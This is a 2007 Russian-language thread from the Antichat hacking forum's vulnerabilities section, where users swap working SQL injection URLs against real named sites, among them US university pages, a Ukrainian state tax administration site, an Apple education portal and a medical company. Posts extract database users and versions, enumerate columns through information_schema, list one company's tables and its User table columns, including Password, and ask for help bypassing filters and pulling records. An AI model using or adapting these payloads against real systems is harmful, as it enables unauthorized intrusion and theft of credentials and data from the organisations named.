ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2671  
Старый 09.07.2007, 21:27
Аватар для Shram-spb
Shram-spb
Познающий
Регистрация: 06.06.2007
Сообщений: 83
Провел на форуме:
404154

Репутация: 140
Отправить сообщение для Shram-spb с помощью ICQ
По умолчанию

Таблицы не подобрал
Код:
http://asun.unl.edu/page.php?page_id=1+union+select+1,2,3/*
 
Ответить с цитированием

  #2672  
Старый 09.07.2007, 21:50
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

Y.Dmitriy, limit поюзай и все будет открываться
[code]http://transport.su/news.php?rub=6&id=23212+union+select+1,2,3,4,5,6,7 ,login,9,10+from+users+limit+2,1/*[code]
 
Ответить с цитированием

  #2673  
Старый 09.07.2007, 23:03
Аватар для Shram-spb
Shram-spb
Познающий
Регистрация: 06.06.2007
Сообщений: 83
Провел на форуме:
404154

Репутация: 140
Отправить сообщение для Shram-spb с помощью ICQ
По умолчанию

Код:
http://kipelov.ru/ly.php?idtxt=-1+union+select+2,3,4/*
)
 
Ответить с цитированием

  #2674  
Старый 10.07.2007, 00:46
Аватар для anakreon
anakreon
Познающий
Регистрация: 19.03.2006
Сообщений: 37
Провел на форуме:
400363

Репутация: 11
По умолчанию

Сайтег Гарварда...
Код:
http://www.law.harvard.edu/faculty/directory/facdir.php?id=20+union+select+user(),database()/*
facdir@localhost: academics

Последний раз редактировалось anakreon; 10.07.2007 в 01:15..
 
Ответить с цитированием

  #2675  
Старый 10.07.2007, 15:57
Аватар для Y.Dmitriy
Y.Dmitriy
Постоянный
Регистрация: 14.03.2007
Сообщений: 367
Провел на форуме:
1392441

Репутация: 161
Отправить сообщение для Y.Dmitriy с помощью ICQ Отправить сообщение для Y.Dmitriy с помощью AIM Отправить сообщение для Y.Dmitriy с помощью MSN
По умолчанию

САЙТ ГОСУДАРСТВЕННОЙ НАЛОГОВОЙ АДМИНИСТРАЦИИ УКРАИНЫ
!!!!СЦУКО НЕНАВИЖУ!!!
Цитата:
http://www.sta.gov.ua/basa1/data.php3?reason=access&sess=&rub=-1+union+select+1,user(),3,4/*
 
Ответить с цитированием

  #2676  
Старый 10.07.2007, 17:53
Аватар для helat
helat
Участник форума
Регистрация: 22.01.2007
Сообщений: 218
Провел на форуме:
1852162

Репутация: 156
По умолчанию

Цитата:
Сообщение от Y.Dmitriy  
САЙТ ГОСУДАРСТВЕННОЙ НАЛОГОВОЙ АДМИНИСТРАЦИИ УКРАИНЫ
!!!!СЦУКО НЕНАВИЖУ!!!
Ещё бы пасс.
Супер
 
Ответить с цитированием

  #2677  
Старый 10.07.2007, 20:50
Аватар для z01b
z01b
Постоянный
Регистрация: 05.01.2007
Сообщений: 508
Провел на форуме:
2360904

Репутация: 1393


По умолчанию

Цитата:
Сообщение от Shram-spb  
Таблицы не подобрал
Код:
http://asun.unl.edu/page.php?page_id=1+union+select+1,2,3/*
http://asun.unl.edu/page.php?page_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),13,1 4,15/*
вот подобрал колонки!

Последний раз редактировалось z01b; 10.07.2007 в 20:55..
 
Ответить с цитированием

  #2678  
Старый 10.07.2007, 21:37
Аватар для Shram-spb
Shram-spb
Познающий
Регистрация: 06.06.2007
Сообщений: 83
Провел на форуме:
404154

Репутация: 140
Отправить сообщение для Shram-spb с помощью ICQ
По умолчанию

http://stumpage.uvm.edu/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12 +from+information_schema.columns/*/
 
Ответить с цитированием

  #2679  
Старый 11.07.2007, 06:11
Аватар для Dr.Frank
Dr.Frank
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427

Репутация: 187
Отправить сообщение для Dr.Frank с помощью ICQ
По умолчанию

http://edcommunity.apple.com/ali/news_feed.php?itemID=9449'+order+by+9/*
http://edcommunity.apple.com/ali/item.php?itemID=11767'+union+select+1/*

P.S.:
как можно обойти это:
Код:
http://edcommunity.apple.com/ali/search.php?collectionID=1234&order=1+union+select+1,2/*
 
Ответить с цитированием

  #2680  
Старый 11.07.2007, 08:58
Аватар для Dr.Frank
Dr.Frank
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427

Репутация: 187
Отправить сообщение для Dr.Frank с помощью ICQ
По умолчанию

MsSql:

http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=@@versi on--
http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=(select +db_name())--
http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=(select +system_user)--

Таблицы:
D99_Tmp
Category
D99_CMD
Dic_BodyPart
Dic_HX
Dic_Language
Dic_State
Dic_Test
dtproperties
ip
Message
Rights
Role
SessionAction
SessionLog
Siwebtmp
Subscriber
sysconstraints
syssegments
systables
User
v_Category
v_Rights
v_SessionActions

Нашел все колонки в таблице User:
ID
RoleRef
System
Name
Password
FirstName
LastName
EMail

Не получилось последнее:
Код:
http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=(SELECT+TOP+1+Name+from+User+where+ID=3)--
Как реализовать?

Последний раз редактировалось Dr.Frank; 11.07.2007 в 09:09..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ